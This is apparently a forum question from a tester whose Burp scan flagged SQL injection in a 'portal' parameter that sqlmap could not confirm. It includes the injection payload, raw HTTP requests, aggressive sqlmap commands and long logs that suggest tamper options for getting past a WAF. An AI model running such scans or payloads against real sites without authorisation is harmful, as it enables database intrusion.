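I am doing a site survey, and while scanning the site with Burp it reported that the site is vulnerable to SQL injection, but I cannot reproduce it with sqlmap
Issue detail: The portal parameter appears to be vulnerable to SQL injection attacks. The payload 65254334 or 6399=06399-- was submitted in the portal parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Included are the requests found in Burp and the output of some sqlmap sessions.
What am I doing wrong? Can anyone help me?
These are the commands used:
sqlmap -r portal.req --force-ssl --dbs --time-sec 8
sqlmap -r base.req --force-ssl --dbs --batch --random-agent
sqlmap -r portal.req --force-ssl --dbms mysql --time-sec 8 --level 5 --risk 3 --random-agent --batch
Everything ends with the same result: "none"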
Issue Request
GET /site/media/nl/portal.js?portal=165254334%20or%206399%3d06399--%20&_=_1123222212290099896yx261lkjxq1222 HTTP/1.1
Host: myxxxxxx.xxxxx.xxxx.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://myxxxx.xxxx.xxxx.com/login/
Cookie: PHPSESSID=Removed; ASP.NET_SessionId=Removed; sfcProduct=Removed
Base Request
GET /site/media/nl/portal.js?portal=1&_=_1123222212290099896yx261lkjxq1222 HTTP/1.1
Host: myxxxxx.xxxxxx.xxxxxx.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://myxxxxx.xxxxx.xxxxxx.com/login/
Cookie: PHPSESSID=Removed; ASP.NET_SessionId=Removed; sfcProduct=Removed
[11:18:41] [INFO] parsing HTTP request from 'portal.req'
[11:18:42] [WARNING] it appears that you have provided tainted parameter values ('portal=165254334 or 6399=06399-- ') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[11:18:45] [INFO] testing connection to the target URL
[11:18:45] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[11:18:45] [INFO] testing if the target URL content is stable
[11:18:47] [INFO] target URL content is stable
[11:18:47] [INFO] testing if GET parameter 'portal' is dynamic
[11:18:47] [INFO] GET parameter 'portal' appears to be dynamic
[11:18:48] [INFO] heuristic (basic) test shows that GET parameter 'portal' might be injectable (possible DBMS: 'MySQL')
[11:18:48] [INFO] heuristic (XSS) test shows that GET parameter 'portal' might be vulnerable to cross-site scripting (XSS) attacks
[11:18:48] [INFO] testing for SQL injection on GET parameter 'portal'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[11:18:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:18:56] [WARNING] reflective value(s) found and filtering out
[11:19:00] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[11:19:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[11:19:13] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[11:19:25] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[11:19:38] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:20:01] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[11:20:24] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[11:20:50] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[11:21:18] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[11:21:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[11:22:10] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[11:22:35] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[11:22:36] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[11:22:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[11:22:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[11:22:38] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[11:22:38] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[11:22:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[11:22:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[11:22:41] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[11:22:41] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[11:22:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[11:22:54] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[11:22:54] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:23:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:23:26] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:23:41] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:23:56] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:24:12] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:24:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:24:43] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:24:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:25:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:25:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:25:44] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:25:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:26:13] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[11:26:28] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[11:26:35] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:26:45] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[11:26:45] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[11:26:46] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[11:26:46] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[11:26:46] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[11:26:47] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:26:47] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[11:26:47] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[11:26:48] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[11:26:49] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[11:26:49] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[11:26:50] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[11:26:50] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[11:26:51] [INFO] testing 'MySQL inline queries'
[11:26:51] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[11:26:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:27:08] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[11:27:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[11:27:26] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[11:27:32] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:27:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:27:56] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[11:28:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[11:28:23] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[11:28:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[11:28:46] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[11:28:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[11:29:03] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[11:29:12] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[11:29:26] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[11:29:41] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)'
[11:29:52] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[11:30:01] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[11:30:17] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[11:30:26] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[11:30:41] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[11:30:50] [INFO] testing 'MySQL AND time-based blind (ELT)'
[11:31:04] [INFO] testing 'MySQL OR time-based blind (ELT)'
[11:31:21] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[11:31:30] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[11:31:41] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:31:51] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:31:56] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[11:31:57] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[11:31:57] [INFO] testing 'MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries)'
[11:31:57] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[11:31:57] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[11:31:58] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[11:31:58] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[11:31:59] [INFO] testing 'MySQL <= 5.0.11 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[12:12:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:12:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[12:13:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[12:13:47] [WARNING] GET parameter 'portal' does not seem to be injectable
[12:13:47] [INFO] testing if GET parameter '_' is dynamic
[12:13:48] [WARNING] GET parameter '_' does not appear to be dynamic
[12:13:48] [INFO] heuristic (basic) test shows that GET parameter '_' might be injectable (possible DBMS: 'MySQL')
[12:13:48] [INFO] testing for SQL injection on GET parameter '_'
[12:13:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:13:50] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:13:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:13:58] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:14:11] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[12:14:58] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[12:14:58] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[12:15:03] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[12:15:17] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[12:15:29] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[12:15:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[12:15:59] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[12:16:20] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[12:16:31] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[12:16:50] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[12:16:50] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[12:16:50] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[12:16:50] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[12:16:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[12:16:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[12:16:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[12:16:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[12:16:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[12:16:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[12:16:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[12:16:59] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[12:16:59] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:17:13] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:17:27] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:17:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:18:00] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:18:18] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:18:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:18:53] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:19:39] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:21:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:21:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:21:53] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:22:12] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:22:37] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[12:22:55] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[12:23:07] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:23:21] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[12:23:21] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[12:23:21] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[12:23:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:23:22] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[12:23:22] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[12:23:22] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[12:23:23] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[12:23:24] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[12:23:24] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[12:23:26] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[12:23:26] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[12:23:27] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[12:23:28] [INFO] testing 'MySQL inline queries'
[12:23:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[12:23:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[12:23:51] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[12:24:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[12:24:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:24:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:24:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:24:52] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[12:25:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[12:25:35] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[12:26:10] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[12:26:37] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[12:26:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[12:27:07] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[12:27:21] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[12:27:37] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[12:27:52] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)'
[12:28:02] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[12:28:11] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[12:28:26] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[12:28:36] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[12:28:50] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[12:29:00] [INFO] testing 'MySQL AND time-based blind (ELT)'
[12:29:14] [INFO] testing 'MySQL OR time-based blind (ELT)'
[12:29:28] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[12:29:37] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[12:29:47] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:29:57] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:30:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[12:30:03] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[12:30:03] [INFO] testing 'MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries)'
[12:30:03] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[12:30:03] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[12:30:04] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[12:30:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[12:30:04] [INFO] testing 'MySQL <= 5.0.11 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
[12:30:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:30:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[12:30:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[12:30:49] [WARNING] GET parameter '_' does not seem to be injectable
[12:30:49] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[12:30:49] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 5304 times
_________________________________________________________________________
[15:10:13] [INFO] parsing HTTP request from 'base.req'
[15:10:14] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.10' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[15:10:14] [INFO] testing connection to the target URL
[15:10:22] [INFO] testing if the target URL content is stable
[15:10:31] [INFO] target URL content is stable
[15:10:31] [INFO] testing if GET parameter 'portal' is dynamic
[15:10:31] [WARNING] GET parameter 'portal' does not appear to be dynamic
[15:10:39] [WARNING] heuristic (basic) test shows that GET parameter 'portal' might not be injectable
[15:10:52] [INFO] testing for SQL injection on GET parameter 'portal'
[15:10:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:11:27] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:11:28] [WARNING] reflective value(s) found and filtering out
[15:11:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:11:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:11:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:12:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:12:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[15:12:22] [INFO] testing 'MySQL inline queries'
[15:12:22] [INFO] testing 'PostgreSQL inline queries'
[15:12:23] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:12:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:12:23] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[15:12:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:12:33] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:12:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:12:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:12:53] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[15:13:01] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[15:13:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:13:27] [WARNING] user aborted during detection phase
[15:14:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:15:30] [WARNING] GET parameter 'portal' does not seem to be injectable
[15:15:30] [INFO] testing if GET parameter '_' is dynamic
[15:15:33] [WARNING] GET parameter '_' does not appear to be dynamic
[15:15:35] [WARNING] heuristic (basic) test shows that GET parameter '_' might not be injectable
[15:15:43] [INFO] testing for SQL injection on GET parameter '_'
[15:15:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:16:00] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:16:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:16:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:16:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:16:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:17:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[15:17:09] [INFO] testing 'MySQL inline queries'
[15:17:12] [INFO] testing 'PostgreSQL inline queries'
[15:17:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:17:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:17:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:17:26] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:17:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:17:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:17:38] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[15:17:42] [INFO] testing 'Oracle AND time-based blind'
[15:17:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:18:11] [WARNING] GET parameter '_' does not seem to be injectable
[15:18:11] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment')
[15:18:11] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 7 times